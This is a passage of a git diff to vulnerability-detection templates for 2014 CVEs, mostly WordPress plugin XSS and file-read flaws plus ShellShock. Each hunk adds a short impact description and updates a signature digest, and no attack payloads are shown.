     - https://www.oracle.com/security-alerts/cpujul2014.html
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207016a1bb2c1292cfa19e80b800f0be023d04307cc0d2726810278e4216525fc6022024a26e7bf609dceb719dc4d68120367c53d3a306d98bd58a83e7223619ffaf23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203a40b5fed795b018d009f79227d028b7ed18bab2a342bd3510ecb3f147227e1e02205fefdc746fb4b81255fe35e0b17becc7d8b5d01c9e8798116d55c26056552a67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml
index 917f532fcf..1c1320c4c3 100644
--- a/http/cves/2014/CVE-2014-4513.yaml
+++ b/http/cves/2014/CVE-2014-4513.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100859481bdd9b5a30d7f3a6927e35509ffd3a9764216237304ecfdac87ab930d2102200fece8b5c38a5c66599ac04458f0a084035444b052dd143b136ea59a79ba52c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202f239af02dc3d7a82f42336509f9bfa2152d16e586f60ef223df03ac864cb3f5022100a83dd297b3d178a07579b11715ac2b258ef079b469c99a5399a23c3513c26eb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml
index f2be024427..07f581a9c9 100644
--- a/http/cves/2014/CVE-2014-4535.yaml
+++ b/http/cves/2014/CVE-2014-4535.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
   remediation: |
     Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220213930c6a99b15ee189b56653c24ec5b066d507da0a9ee1952163d188741bd8f02200d6ddfda7e9d6effac0543ee2048630e46e11a66c015b9b9a83d63c48e8cd834:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b748ec3f080c43508a6e4b86ccae498e26c3614f2f06acc017d568fb99cdfb8402206569d13cb86a37da3dfa4744e75680fe26e2dd70d3391c8bf1488d20bd54022d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml
index 3790a9b1c0..ea96f726a5 100644
--- a/http/cves/2014/CVE-2014-4536.yaml
+++ b/http/cves/2014/CVE-2014-4536.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022007a52ee36df3f6f3c98eea6040d4c81debbdafbae1081122b4721140de2fd7f8022100bd3be8ac12f0cc19795e8d3b5fae95495665bbc39cdf744ca1e7837f9d6cb974:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220580487d990fbf72c8ad3e2af7c2ae2b1d78dd55f71719677cc110f2130109a6c0221008209a0edafca0fb9da9ecb63df77fb96399a3c7328cc83cb7169a6ac62fc13c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml
index 68010d805a..bb26d88096 100644
--- a/http/cves/2014/CVE-2014-4539.yaml
+++ b/http/cves/2014/CVE-2014-4539.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207832dde72d78ed46425bdca6d18335c62ac522b898166c9b650e7a6081bfca29022100a1caa21f95817d22ca68c129e60545dde0909e3522eb39882238810efa0ea2d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210094c57de15f97fca4490843b947b7b690e1aa66fd6313ae1fc8efb8d3dda0e38102210099a8ad854656ce1b02f2890a1a3817915ef09aa5545cd42c952391d7304c75ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml
index 51e86b129c..7e927c78d9 100644
--- a/http/cves/2014/CVE-2014-4544.yaml
+++ b/http/cves/2014/CVE-2014-4544.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201b0a6aadbdc372ebcbbd9239208d333ffcbb2244f1786a283f73103f9f0b50be0221009b621f690dadbafd005804582c3cc07f89362fe1afce06fbf8897826d9b84c06:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220078759a06ea361276eb0cfd93bdd686cc6a0d4efa87b282c90531a3f9ac199e402204e90184620d595a421ed934c84affd49e89d27945d56eeb33bdd981da2c147fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml
index 5923c1b605..facf173194 100644
--- a/http/cves/2014/CVE-2014-4550.yaml
+++ b/http/cves/2014/CVE-2014-4550.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.
+  impact: |
+    Allows remote attackers to inject arbitrary web script or HTML via crafted shortcode parameters, leading to potential session hijacking, defacement of web pages, or theft of sensitive information.
   remediation: |
     Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220551c720843bca8770909340fa644703ad667a0131e46325c82ba14bf35b68a6f022100868bb25c84d2cb621c014928d51572f693937d19cf43cad832dc6b5d4296b9c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220674dc3985feafe800dab520f51e8b6a033ee9f73f3b00c39b64ad2e95577664b022022ff4f244837aa3f3778ec97181d38f45697688f3f763adf29b40ae0aa412080:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml
index fa84a45c2b..1f24b30292 100644
--- a/http/cves/2014/CVE-2014-4558.yaml
+++ b/http/cves/2014/CVE-2014-4558.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022078964445dd9a6a3593869597ea089036752028ee3f3d159f6d5566151056430a022100eb6052dc6ccc6970789459d0c55d2a3ccf9a7c879e676419804fd192b92e85ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022011cf10d2dca5ad1bfbafb9189c4e9e94a4ff5251092564acfc7eb9be066a59a402201ba84244ed93964ca7562d9622b1199d64197ec0e2ca3e9f2718588a8e0c2bdc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml
index d32ddbc9a7..bfb094135e 100644
--- a/http/cves/2014/CVE-2014-4561.yaml
+++ b/http/cves/2014/CVE-2014-4561.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information.
   remediation: |
     Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220656a765b3d6ea9c77a27fadcea6d6216fd497dacfd67351d47115a77ba006d9c0221009ec8e8d5551f5b5b6b69f6fcde213631625824278da4302b6ac93ca11174632d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022042aa2ddd1022544d8185c099e43d84553656bb11fbaeb242bd651b484c72205202203f36ad98e74813720a2296cbd40314a62cbd6bf9a035af5f72212da73f512846:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml
index b9e1c9161b..5cf2ff65ff 100644
--- a/http/cves/2014/CVE-2014-4940.yaml
+++ b/http/cves/2014/CVE-2014-4940.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a3c87ebe1997f2f85335f10f396664725af3109be9afdacdc1b9ba3461ee1e5c022100e57651aff4bf12a6a253995e1953db6404726660434b67e9fcbf4fbb6eec850c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100939d2492f177511e28f9ca4f04b091c26b2840e2752c100c18e5f7607e0e99690220291f5aeece7127eb31b4fe976f62f4f111784d098337e2a3199815b06d4bfb76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml
index f03d407cc6..a2a410c66a 100644
--- a/http/cves/2014/CVE-2014-4942.yaml
+++ b/http/cves/2014/CVE-2014-4942.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
+  impact: |
+    An attacker can gain sensitive information from the target system.
   remediation: |
     Upgrade to WordPress EasyCart version 2.0.6 or later.
   reference:
@@ -53,4 +55,4 @@ http:
         group: 1
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
-# digest: 4a0a004730450221009c44f64ce735145446058ea2e9a0ad9dcf1236fcf379a1854ef5bfa5c542ee1a02200e220f53b5cf52e8ffff5330507ab9fadf8a4b1e87279616ffae5e3b4ba6fa19:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e2e3a29c5c8bc10e79128f4312f2bab1aaf968ad6df5cec5e083f699ffc7db2c022100d40f450a35bc1660b8834509073001ab8669c8f3fc898ef47a37729c3209c692:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml
index 28a3b613a9..20a3c68cea 100644
--- a/http/cves/2014/CVE-2014-5111.yaml
+++ b/http/cves/2014/CVE-2014-5111.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Apply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205385ba7d82d34f74bed76b5b2cd51e8acd6868fe05073c4bed7b42660ff00d57022100f35ebb33e8c097d1d81121484b8f9f8365e5ff2335d36892b66172925e637f5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205e081b249fdecf9eb227be78bafd317b0423a0967e6b7024fead0d8b94d477140220527f9511cf4a42bd722a8541b9eb53b7a6b0f6adc53e1581588e5f137d3e9964:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml
index 92464f0ad3..392924b8c1 100644
--- a/http/cves/2014/CVE-2014-5258.yaml
+++ b/http/cves/2014/CVE-2014-5258.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f4dcc343898ef33caa2e53b4d40c858c61d2d525116289118c822967c927358d0220799c54f4f95dc50945f8caf610a4de0be060b9488ebd46adb4b851787865ba2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c76d479ef7be8d7cb3a49a980c9380d6f85db4eef26ba91d6e8e206f4025c7d9022100ba26dd2e98682b2131b4a893b2e62a027dc2bd72e461ab2794d5ad82fd515657:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml
index f39d3eaa58..34942a093e 100644
--- a/http/cves/2014/CVE-2014-5368.yaml
+++ b/http/cves/2014/CVE-2014-5368.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.
   remediation: |
     Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204b864e59db21fb15164e360d8ce6f177a31a5cf283087274bba542e246706e3d02205094860acd15428f2ebe354cdff5fed3d8e11a5267717b4d27ae6f95b0c0cc11:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bcf488a5ee22f771e6cde4fc5c288d534d32f4d6d9bb07584cff635451995606022100b9644182411ee85745c3a47c7e52cc85e8e4af74fa57d03901bfa8a48e8ac8d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml
index 6a0e85b072..1a0a403296 100644
--- a/http/cves/2014/CVE-2014-6271.yaml
+++ b/http/cves/2014/CVE-2014-6271.yaml
@@ -5,6 +5,8 @@ info:
   author: pentest_swissky,0xelkomy
   severity: critical
   description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
+  impact: |
+    Remote code execution can lead to unauthorized access, data theft, and system compromise.
   remediation: |
     Apply the necessary patches and updates provided by the vendor to fix the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205e2e5ce760f7d7720fd5577d167a9c53914cfd1f703bec11d04c39c7d63506a5022077fa374756b072c53fda8edb7cb3ecaab1b834152550c89c97a2fefd9d9f592b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fcbe4e3ef3ec2a5a7f542b1a0bed02aafcec6b1be0beb375e3fb515ba4da61dd02203ca9d29dc41fe4bf7b94e7b64513f8413134c3def97e9c53c71780186dfb2bc1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml
index bc3d1dfa17..1eaffcd068 100644
--- a/http/cves/2014/CVE-2014-6287.yaml
+++ b/http/cves/2014/CVE-2014-6287.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: |
     Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022004360e573af6fd119dc9c4ad50529da651d4e31594775cb99ae330bc64a41ca40220560a12723b42c17e6c3034206e6d40925ba9258537dd8eabe95386d989b16013:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009347b996d3b96812928efff46fc86e2f49cadcd9ea27ca22fbf7acf421551025022100845b99770e2a0a23ab42bd7d8eec7ae2704b0a92652746e206d0d73c889ea61c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml
index 91f32e16f5..7c5e4528d2 100644
--- a/http/cves/2014/CVE-2014-6308.yaml
+++ b/http/cves/2014/CVE-2014-6308.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
   remediation: |
     Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022050c5c6a5cd572f5a59c4b8335fe9aac95a19c24cd96d66981cdd8d7431c7daf0022100a8851b528e9c8399a2f5893f710ce06295a1f1449e175c6efaaeadf6c0c6348e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207ba5d391f4bc4249d227d1eab814430eeac95aaabb62b0df76e35601de8d053b02202dd809b088914d79c49e26bed81ad3831b925e9d2760750d768b91a0cd548979:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml
index 089c2979d4..097d139294 100644
--- a/http/cves/2014/CVE-2014-8676.yaml
+++ b/http/cves/2014/CVE-2014-8676.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200545752eb1ad95a8b88f3799f01598bc6bba8046946c4bf17776ff3a9a2d384b02203c32e1f614c65d71b366a3a160aba6a0e8e4f08d38bfa9c70f956a7937754698:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205980eb0331cb2cbaa25a754343fd227926af2349658a6bd3e31e9e5dd63266f4022100976d91d5ef4ffb839cf575e6c8060b935352dbaec7e85339fc179b984311b0e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml
index f2238e53db..b796dc21a7 100644
--- a/http/cves/2014/CVE-2014-8682.yaml
+++ b/http/cves/2014/CVE-2014-8682.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK,daffainfo
   severity: high
   description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Apply the latest security patches and updates provided by the Gogs project to mitigate the SQL Injection vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201655c02c331faab4f12e7bac5ef9a6b88fbcadfebfbcb1a647638f1461166b96022024a6533fcb4f3508f13eec4c0cf09806fa824c77068c45924bf29ace7320b600:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cee757ee0d7654311ad8ab53b1c6efc3e794cc3d407b696f987bd0ac6e4217100221008943b9d8ec3e3312f09d975cd64ca4c6ca5ad220b6feb604206990429aefcefa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml
index 8a0539d5ce..2bd03dd962 100644
--- a/http/cves/2014/CVE-2014-8799.yaml
+++ b/http/cves/2014/CVE-2014-8799.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server.
   remediation: |
     Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210093dfb36a67ecfb00be5bda2bf4c43d7251039254bb25c0364e6c5be42045b0ab022100b25b851739d367e0ab7abfa23ef9e2d66886dae5cfcb9bad895e4e489b154dfe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100be312073dc375dc52c51803c15957fa59ab561a94ae230469761fba8c62658a0022031b68c07810286d1fc7982a1432cd733266d96e79cbefd78ecfe7efda1a537da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml
index 1a36af1c54..8228f76137 100644
--- a/http/cves/2014/CVE-2014-9094.yaml
+++ b/http/cves/2014/CVE-2014-9094.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022020c46b058baab97ce2656443dacd9df604ae07061d76113f03b83b0fce967e4f022074a68feb799f64aa2abce263b80a22a446ee0f7244384a37a7ead9c868289e70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f084b104246235303018810d8792e5824f630fe35d47333a776aa806420a6c0c022062d18f14655f54971c7b74c76d67da39eab2a28c3cda0cc3299aa71eb27e4377:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml
index 2f3635d663..4d8ec043d4 100644
--- a/http/cves/2014/CVE-2014-9119.yaml
+++ b/http/cves/2014/CVE-2014-9119.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+  impact: |
+    Allows an attacker to read arbitrary files on the server.
   remediation: |
     Update WordPress DB Backup plugin to version 4.6 or higher.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220354af28db910454c7fbf68b9afafd7e89f6d663f459473a59119e4d18b83af810220082ae874d8196bf5e88526f6134b4c358552f129900b63e5c5c6e0f376fbe443:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c64929f18a5e5a9f52a1e9f98cd8b6fd54e28629ed8a90951c20fb3d92ebbabc022100f78ad31e5bed3c7f887f144e59a93df2262514c88a51c84587aa2b92bba8c949:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml
index 894b287114..85b035104f 100644
--- a/http/cves/2014/CVE-2014-9444.yaml
+++ b/http/cves/2014/CVE-2014-9444.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
+  impact: |
+    Allows remote attackers to inject arbitrary web script or HTML via a crafted file name, leading to potential session hijacking, defacement, or data theft.
   remediation: |
     Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220133923f2c7e594402e0d5b91e6c360fc4ebc048bc279db6b78d5934dd9dcc7cb02205d80f050fe9083ff7754a12e5882844035a49ffaa454090520fa5af3749ae0b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bd9eb9a380f1fbf2726b31147593ca7e895c82ec04ff2accc04d4f055b7a3abf02203dcb6e5cfea4af4ce138824fbba863dc75aae8c7c651dd7e4f01291b17e8c36f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml
index 21449ca88a..cb463199e7 100644
--- a/http/cves/2014/CVE-2014-9606.yaml
+++ b/http/cves/2014/CVE-2014-9606.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
